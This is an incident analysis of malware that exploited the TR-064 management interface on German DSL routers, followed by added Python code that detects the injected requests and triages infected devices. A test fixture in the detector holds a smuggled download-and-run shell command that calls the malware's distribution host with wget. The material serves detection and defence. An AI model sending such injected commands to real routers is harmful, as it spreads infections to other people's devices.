Yesterday a large number of DSL users in Germany began reporting problems with their routers and very slow internet connections. From the volume of reports and the technical analysis that followed, the following findings emerged.

It was determined that the remote management protocol, which allows the router's configuration interface to be reached remotely, had been exploited.

The request involved is described in the TR-064 specification (DSL CPE configuration methods).
In summary, the malware that exploits this vulnerability on the Linux-based router downloads an executable named 1 from http://l.ocalhost[.]host into the /tmp directory with wget and runs it. The IP address that l.ocalhost[.]host resolved to changed constantly throughout the day.
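The following is an added example, not code from the original post: a small detector that inspects HTTP requests destined for TCP port 7547, recognises TR-064 SOAP bodies and flags parameter values that carry a shell command fetching something into /tmp with wget. The two sample requests are constructed; the path /tr064, the service name Example:1, the parameter NewValue and the chmod step are placeholders and not identifiers taken from the real attack traffic.

```python
"""Flag TR-064 requests to TCP/7547 whose SOAP body smuggles a shell command.

Added example, not code from the original post.  The sample requests, the
request path, the service name and the parameter name are constructed.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

CWMP_PORT = 7547  # TCP port of the exposed CPE management interface

# Fragments that never belong in a legitimate TR-064 parameter value.
DOWNLOADERS = ("wget", "curl", "tftp")
EXEC_HINTS = ("/tmp", "chmod", ";", "&&", "||", "`", "$(", "sh -c")

URL_RE = re.compile(r"(?:https?|ftp)://[^\s\"'<>;|&]+")
# Simple <Name>text</Name> pairs; the injected command sits in such a value.
TAG_TEXT_RE = re.compile(r"<([A-Za-z0-9_]+)>([^<]*)</\1>")


@dataclass
class Finding:
    src: str
    soap_action: str
    parameter: str
    command: str
    download_url: Optional[str]


def split_request(raw: str) -> Tuple[dict, str]:
    """Split a raw HTTP request into (lower-cased header dict, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    headers = {}
    for line in head.splitlines()[1:]:  # skip the request line
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return headers, body


def inspect_request(src: str, dst_port: int, raw: str) -> Optional[Finding]:
    """Return a Finding when a TR-064 request carries a download-and-run command."""
    if dst_port != CWMP_PORT:
        return None
    headers, body = split_request(raw)
    action = headers.get("soapaction", "")
    if "dslforum-org" not in action and "dslforum-org" not in body:
        return None  # not a TR-064 SOAP request at all
    for name, value in TAG_TEXT_RE.findall(body):
        has_downloader = any(tool in value for tool in DOWNLOADERS)
        has_exec_hint = any(hint in value for hint in EXEC_HINTS)
        if has_downloader and has_exec_hint:
            match = URL_RE.search(value)
            return Finding(src, action, name, value.strip(),
                           match.group(0) if match else None)
    return None


def scan(requests: Iterable[Tuple[str, int, str]]) -> List[Finding]:
    """Run inspect_request over (src, dst_port, raw_request) records."""
    return [f for f in (inspect_request(*r) for r in requests) if f is not None]


# Constructed sample traffic (placeholder path, service and parameter names).
BENIGN_REQUEST = (
    "POST /tr064 HTTP/1.1\n"
    "Host: 192.0.2.1:7547\n"
    "SOAPAction: urn:dslforum-org:service:Example:1#GetInfo\n"
    "\n"
    '<?xml version="1.0"?>\n'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>\n'
    '<u:GetInfo xmlns:u="urn:dslforum-org:service:Example:1"/>\n'
    "</s:Body></s:Envelope>\n"
)
MALICIOUS_REQUEST = (
    "POST /tr064 HTTP/1.1\n"
    "Host: 192.0.2.1:7547\n"
    "SOAPAction: urn:dslforum-org:service:Example:1#SetValue\n"
    "\n"
    '<?xml version="1.0"?>\n'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>\n'
    '<u:SetValue xmlns:u="urn:dslforum-org:service:Example:1">\n'
    # wget into /tmp and run "1" as in the post; the chmod step is assumed.
    "<NewValue>cd /tmp;wget http://l.ocalhost.host/1;chmod +x 1;./1</NewValue>\n"
    "</u:SetValue></s:Body></s:Envelope>\n"
)

if __name__ == "__main__":
    for finding in scan([("198.51.100.7", 7547, BENIGN_REQUEST),
                         ("198.51.100.7", 7547, MALICIOUS_REQUEST)]):
        print(f"{finding.src} -> {finding.soap_action}: "
              f"{finding.parameter}={finding.command!r} url={finding.download_url}")
```

The detector keys on the combination of a download tool and a shell or /tmp reference inside a parameter value, so a legitimate hostname or timestamp in the same field is not flagged; the extracted URL is what you would pivot on to block the distribution host.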

Once started, the executable:
– deletes itself from the file system and keeps running only in memory
– closes port 7547 with iptables
– scans for and infects other devices over TCP port 7547

Note, however, that the malware only ever writes itself to the /tmp directory and does not write to the persistent file system, so it does not survive a restart of the router. A reboot removes the infection but not the exposure: a router that still exposes port 7547 can simply be infected again by the next scanning device.
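The two host-side artefacts described above, an executable unlinked from /tmp while its process keeps running and an iptables rule closing TCP/7547, are exactly what a triage script should look for on a suspect router. The following is an added example, not code from the original post: it parses `iptables-save` output and the targets of `/proc/<pid>/exe` links (collected live on a Linux host, or from the constructed samples below otherwise); the process IDs, paths and rule text in the samples are made up.

```python
"""Triage a CPE for the memory-only /tmp malware and the port 7547 block.

Added example, not code from the original post.  SAMPLE_EXE_LINKS and
SAMPLE_IPTABLES are constructed captures, not data from a real device.
"""
import os
from typing import Dict, List, Set, Tuple

DELETED_SUFFIX = " (deleted)"           # how readlink marks an unlinked exe
VOLATILE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
MANAGEMENT_PORT = 7547


def collect_proc_exe_links() -> Dict[int, str]:
    """Read /proc/<pid>/exe for every process (Linux only, may be partial)."""
    links: Dict[int, str] = {}
    try:
        entries = os.listdir("/proc")
    except OSError:
        return links
    for entry in entries:
        if entry.isdigit():
            try:
                links[int(entry)] = os.readlink(f"/proc/{entry}/exe")
            except OSError:  # kernel threads, vanished or unreadable processes
                continue
    return links


def memory_only_processes(exe_links: Dict[int, str]) -> List[Tuple[int, str]]:
    """Processes whose binary was deleted after start: they exist only in RAM."""
    return [(pid, target[:-len(DELETED_SUFFIX)])
            for pid, target in sorted(exe_links.items())
            if target.endswith(DELETED_SUFFIX)]


def volatile_dir_processes(exe_links: Dict[int, str]) -> List[Tuple[int, str]]:
    """Processes running from a RAM-backed directory such as /tmp."""
    return [(pid, target) for pid, target in sorted(exe_links.items())
            if target.startswith(VOLATILE_DIRS)]


def _ports_from_spec(spec: str) -> Set[int]:
    """Expand '7547', '80,7547' or '7000:8000' into a set of ports."""
    ports: Set[int] = set()
    for part in spec.split(","):
        if ":" in part:
            lo, hi = part.split(":", 1)
            ports.update(range(int(lo), int(hi) + 1))
        else:
            ports.add(int(part))
    return ports


def blocked_tcp_ports(rules_text: str) -> Set[int]:
    """TCP destination ports dropped or rejected by INPUT rules in iptables-save text."""
    blocked: Set[int] = set()
    for line in rules_text.splitlines():
        tok = line.split()
        if tok[:2] != ["-A", "INPUT"] or "-p" not in tok or "-j" not in tok:
            continue
        if tok[tok.index("-p") + 1] != "tcp":
            continue
        if tok.index("-j") + 1 >= len(tok) or tok[tok.index("-j") + 1] not in ("DROP", "REJECT"):
            continue
        for flag in ("--dport", "--dports"):
            if flag in tok and tok.index(flag) + 1 < len(tok):
                blocked |= _ports_from_spec(tok[tok.index(flag) + 1])
    return blocked


def port_blocked(rules_text: str, port: int) -> bool:
    return port in blocked_tcp_ports(rules_text)


def triage(exe_links: Dict[int, str], rules_text: str) -> dict:
    """Combine both indicators into one verdict for the router."""
    deleted = memory_only_processes(exe_links)
    volatile = volatile_dir_processes(exe_links)
    blocked = port_blocked(rules_text, MANAGEMENT_PORT)
    return {
        "memory_only": deleted,
        "running_from_tmp": volatile,
        "port_7547_blocked": blocked,
        # Either indicator alone is already worth a closer look; both together
        # match the behaviour described in the post.
        "infected": bool(deleted or volatile) and blocked,
    }


# Constructed samples: a made-up process table and firewall dump.
SAMPLE_EXE_LINKS = {1: "/sbin/init", 412: "/usr/sbin/dropbear", 2931: "/tmp/1 (deleted)"}
SAMPLE_IPTABLES = (
    "*filter\n"
    ":INPUT ACCEPT [0:0]\n"
    "-A INPUT -p tcp -m tcp --dport 7547 -j DROP\n"
    "-A INPUT -i br0 -j ACCEPT\n"
    "COMMIT\n"
)

if __name__ == "__main__":
    live = collect_proc_exe_links()
    print(triage(live or SAMPLE_EXE_LINKS, SAMPLE_IPTABLES))
```

On a real device you would feed `blocked_tcp_ports` the output of `iptables-save` captured over the serial console or SSH; the process check is the stronger signal, since a legitimate firmware update never leaves a running binary whose file has been unlinked from /tmp.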